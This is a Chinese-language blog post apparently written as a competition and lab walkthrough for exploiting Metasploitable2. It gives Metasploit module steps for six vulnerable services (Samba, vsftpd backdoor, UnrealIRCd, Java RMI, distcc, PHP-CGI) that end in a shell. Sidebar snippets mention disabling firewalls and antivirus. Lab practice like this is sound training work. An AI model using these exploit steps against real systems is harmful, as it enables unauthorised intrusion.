网络空间安全大赛

最新推荐文章于 2023-05-15 23:12:42 发布
最新推荐文章于 2023-05-15 23:12:42 发布
阅读量381 收藏 1
点赞数 1
文章标签: 安全 web安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzqk/article/details/128345818
版权

2021年星光国赛题

混战靶机漏洞利用

一、Samba MS-RPC Shell命令注入漏洞(445)

Samba 中负责在 SAM 数据库更新用户口令的代码未经过滤便将用户输入传输给了

/bin/sh。

如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以 nobody 用户的权限执行任意命令。

1. 在kali 中执行msfconsole,启动 metasploit

2. use exploit/multi/samba/usermap_script选择漏洞

3. set RHOST 192.168.56.102 设置要攻击的机器IP

4. run,开始攻击

5. 利用成功,执行uname -a验证

二、Vsftpd 源码包后门漏洞(21)

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

1.在kali 中执行msfconsole,启动metasploit

2.use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

三、UnreallRCd 后门漏洞(6667)

在2009年11月到2010年6月间分布于某些镜面站点的 UnreallRCd,在 DEBUG3DOLOG_SYSTEM 宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行uname -a验证

四、Java RMI SERVER 命令执行漏洞(1099)

Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

1.在kali中执行msfconsole,启动metasploit

2.use exploit/multi/misc/java_rmi_server,选择漏洞

3.set RHOST 192.168.56.102设置要攻击的机器IP

4.run,开始攻击

5.利用成功,得到 meterpreter shell

五、Distcc 后门漏洞(3632)

  1. nmap --script=vuln -p 3632 192.168.84.128

Distcc 用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是 xcode1.5 版本及其他版本的 distcc2.x 版本配置对于服务器端口的访问不限制。

1.在kali 中执行msfconsole,启动metasploit

2.msf>use exploit/unix/misc/distcc_exec选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器IP

4.run,开始攻击

5.利用成功,执行id查看权限,uname -a验证服务器信息

六、PHP CGI 参数注入执行漏洞

GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

漏洞影响版本 php < 5.3.12 or php < 5.4.2

1.在kali中执行msfconsole,启动metasploit

2.msf>use exploit/multi/http/php_cgi_arg_injection 选择漏洞

3.set RHOST 192.168.56.102 设置要攻击的机器lP

4.run,开始攻击

5.meterpreter> Is 获得 meterpreter

Hackers1
关注
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4664
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 6416
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4513
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploit(九) 后漏洞利用
u010680986的博客
09-18 345
1. 清楚痕迹 1)禁用防火墙 首先,需要检查防火墙是否启动:run getcountermeasure meterpreter中打开被攻击系统的shell:netsh firewall show opmode 禁用:netsh firewall show opmode mode=disable 2)禁用杀毒软件和日志删除 文本编辑器打开killav.rb脚本,该文件位置在opt/framework/msf3/scripts/killav.rb,这个脚本里有一些基本的杀毒软件进程,运行会在被攻击
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告
04-27
2018年第四届全国网络空间安全大赛的线上赛解题报告,提供了多个网络攻防实例,详细地解析了参赛者如何利用各种安全漏洞获取flags。以下是报告中涉及的几个Web题目知识点解析。 ### Web题0x01签到题 签到题目通常...
2019年全国职业院校技能大赛网络空间安全大赛Wireshark数据包分析题解(模拟) - JunBlog.pdf
最新发布
07-09
2019年全国职业院校技能大赛网络空间安全大赛Wireshark数据包分析题解(模拟) - JunBlog
ctf网络空间安全大赛实验室领队策划
05-15
CTF(Capture The Flag)网络空间安全大赛是一项旨在提升网络安全技术能力的比赛,对于网络安全技术人员的培养和拓展具有非常重要的意义。CTF网络空间安全大赛实验室领队的角色,就是承担起比赛的策划和组织工作。 ...
2019年某省院校技能大赛中职组《网络空间安全》样题 .doc
09-23
2019年某省院校技能大赛中职组的《网络空间安全》比赛,旨在检验学生的实战技能,包括系统渗透测试和分组对抗。以下是比赛的具体内容和相关知识点: 一、赛项时间安排 比赛共3小时,分为三个阶段,分别是平台搭建与...
2019年江苏省职业技能大赛网络空间安全赛项”竞赛样题.docx
05-11
2019年江苏省职业技能大赛的“网络空间安全”赛项旨在检验参赛者的网络安全技能,包括系统渗透测试、安全加固、攻防对抗等方面的能力。 在竞赛的第一阶段,参赛者需要在单兵模式下进行系统渗透测试与安全加固。具体...
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 372
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
metasploitable2靶机
雨泽网络工作室
08-16 5058
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
metasploitable2漏洞利用之ssh
u011250160的博客
04-22 1397
端口扫描 信息搜集发现是openssh4.7p1 找来找去也没有什么可以直接获取shell的漏洞 下面这个是枚举ssh用户名的脚本 发现用户名 msf里的模块也可以爆破密码,不过相比之下,速度不如hydra 破解出了ssh的用户名和密码就可以去登录了 在linux下直接命令行去连就行了 在windows下需要一个客户端 我这里用的是XShell 注意这里登录后的权限不是root 提权还不会,就先到这把 ...
Metasploit Framework(MSF)对Metasploitable2的渗透解析
黄乔国PHP
05-15 998
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了相关Web漏洞演练平台,如:TWiki,phpMyAdmin。
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7534
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
kali linux对Metasploitable2漏洞利用, postgresql的 代码执行获得反弹shell 笔记
边城浪子的博客
09-20 689
利用 msf 下 postgresql的 代码执行获得反弹shell. 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap 192.168.172.129 nmap -sV -p 5432 192.168.172.129 step2:漏...
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7456
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
微软紧急发布SMBv3协议漏洞-CVE-2020-0796验证、攻击演示、修复和扫描源代码
qq_34801745的博客
03-14 1716
微软紧急发布SMBv3协议漏洞-CVE-2020-0796验证与修复 ** 描述:Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。 为了利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器。若要利用针对客户端的漏洞,未经身份验证的攻击者将需要配...
(让人欲罢不能的靶机系统)metasploitable2安装实战
tangshuangsss的专栏
11-16 4058
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值